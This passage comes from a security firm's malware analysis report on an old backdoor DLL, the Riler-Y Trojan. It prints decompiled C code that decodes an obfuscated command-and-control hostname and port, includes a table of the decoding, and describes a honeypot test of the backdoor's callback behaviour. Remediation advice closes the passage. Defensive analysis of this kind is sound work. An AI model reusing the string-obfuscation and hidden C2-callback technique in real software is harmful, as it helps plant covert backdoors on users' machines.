    Torrid Networks PvtLtd Static Analysis Disassembled DLL in C Language: The following code creates a socket with the encrypted hostname FLGFLGejjiieHK@ (msnmsn.3322.org) and on port number ogog (8080). signed int __cdecl sub_10002450() { int v0; // edi@1 int v1; // ecx@3 char *v2; // edx@4 int v3; // ecx@4 LPSTR (__stdcall *v4)(LPSTR, LPCSTR); // ebx@4 HANDLE v5; // ebp@6 u_short v6; // si@6 signed int v8; // esi@38 int v9; // esi@50 const CHAR *v10; // edi@51 HANDLE v11; // esi@72 SOCKET v12; // [sp-Ch] [bp-E8h]@15 char *v13; // [sp-8h] [bp-E4h]@4 const char *v14; // [sp-8h] [bp-E4h]@15 const char *v15; // [sp-8h] [bp-E4h]@46 int v16; // [sp-4h] [bp-E0h]@4 int v17; // [sp-4h] [bp-E0h]@14 char *v18; // [sp-4h] [bp-E0h]@46 char Str; // [sp+10h] [bp-CCh]@4 HANDLE hObject; // [sp+18h] [bp-C4h]@6 CHAR String1; // [sp+1Ch] [bp-C0h]@4 char v22; // [sp+5Ch] [bp-80h]@45 sub_10002CB0(); v0 = 0; if ( !dword_100064F4 ) sub_10002BB0(); v1 = dword_100064F0++; if ( v1 <= 5 ) { v4 = lstrcpyA; lstrcpyA(&String1, "FLGFLGejjiieHK@ "); //Host Name msnmsn.3322.org v2 = &Str; v16 = (int)"ogog "; //Port 8080 v13 = &Str; } else { v4 = lstrcpyA; dword_100064F0 = 0; lstrcpyA(&String1, "FLGFLGejjiieHK@ "); v16 = (int)"ogog "; v13 = &Str; } ((void (__fastcall *)(int, char *, char *, int))v4)(v3, v2, v13, v16); sub_10002E60(&String1); sub_10002E60(&Str); 16 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 17.
    Torrid Networks PvtLtd Following Code Decodes the hostname and port number by subtracting 55 to the Decimal value of the ACSII character. signed int __cdecl sub_10002E60(const char *a1) { signed int result; // eax@1 int v2; // edx@1 unsigned int v3; // kr00_4@1 result = 0; v2 = 0; v3 = strlen(a1); if ( (signed int)(v3 - 1) > 0 ) { do { result = a1[v2]; if ( result == 32 ) { a1[v2] = 0; } else { result -= 55; if ( result < 33 ) result += 94; a1[v2] = result; } ++v2; } while ( v2 < (signed int)(v3 - 1) ); } return result; } 17 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 18.
    Torrid Networks PvtLtd Decoding the String: As per the above logic the following table decodes the encrypted character string which results hostname as “msnmsn.3322.org” and port number as”8080” Characters from Decimal Value Result = Dec Value If (Result<33) Decoded String - 55 Result + 94 Character F 70 15 109 m L 76 21 115 s G 71 16 110 n F 70 15 109 m L 76 21 115 s G 71 16 110 n e 101 46 . j 106 51 3 j 106 51 3 i 105 50 2 i 105 50 2 e 101 46 . H 72 17 111 o K 75 20 114 r @ 64 9 103 g o 111 56 8 g 103 48 0 o 111 56 8 g 103 48 0 18 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 19.
    Torrid Networks PvtLtd Summary The control server for the backdoor was setup at msnmsn.3322.org (Encoded as FLGFLGejjiieHK@ in the DLL as shown above) which originates at China and this attack is pretty old one and it seems that federal agencies have already taken down the host name msnmsn.3322.org and there is no DNS record for this sub-domain. Backdoor is intelligently programmed to resolve the domain name msnmsn.3322.org to IP address by doing the DNS lookup with some delay inherited, hence making it difficult to catch while analyzing network traffic. Also, there is no network activity from the backdoor till the time DNS lookup is not done. To check for the network activity of the trojan, we setup a local DNS server with master DNS zone 3322.org and thereafter we added another A record msnmsn.3322.org pointing to our internal server running with honeypot. We simulated the backdoor setup once again to see the DNS query being resolved by the backdoor as IP of honeypot. We captured the traffic using sniffer tool and found that after getting positive response from the DNS query, backdoor again waits for few minutes just to confuse the researcher and after a delay, it establishes TCP connection to the resolved IP address (in our case, honeypot’s IP) at the port number 8080 (encoded as ogog in the DLL as shown above). After establishing the connection at port 8080, it waits for some inputs from the server before performing any activity. Since the control server has been shutdown hence backdoor doesn’t get the commands from the remote server and stays as a stealth backdoor waiting for its master to come live again. This particular attack was reported in around 2005 and the backdoor payload is very old which was firstly reported in 2002 and was named as Riler-Y Trojan and there have been few variants from this family in the past. Most of the time, these are part of targeted attack and are not the attacks on the wild. 
Analysis suggests that the version for controller is Stealth 8.1 which seems to be new version of controller with more features like remote VNC, command, DLL injection, etc. Conclusion Though the attack cannot be treated as successful attack due to unavailability of control server which was supposed to be hosted at msnmsn.3322.org, it is highly recommended to remove the Trojan manually by following above analysis report or using some antivirus software from the already compromised machine to avoid losing the control to attacker in case the dead control server is made live again. Also, use patched version of MS Office for older versions (2000, 2003) or it is always recommended to use the latest product release (MS Office 2007 in this case). Contact/Feedback: info@torridnetworks.com 19 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com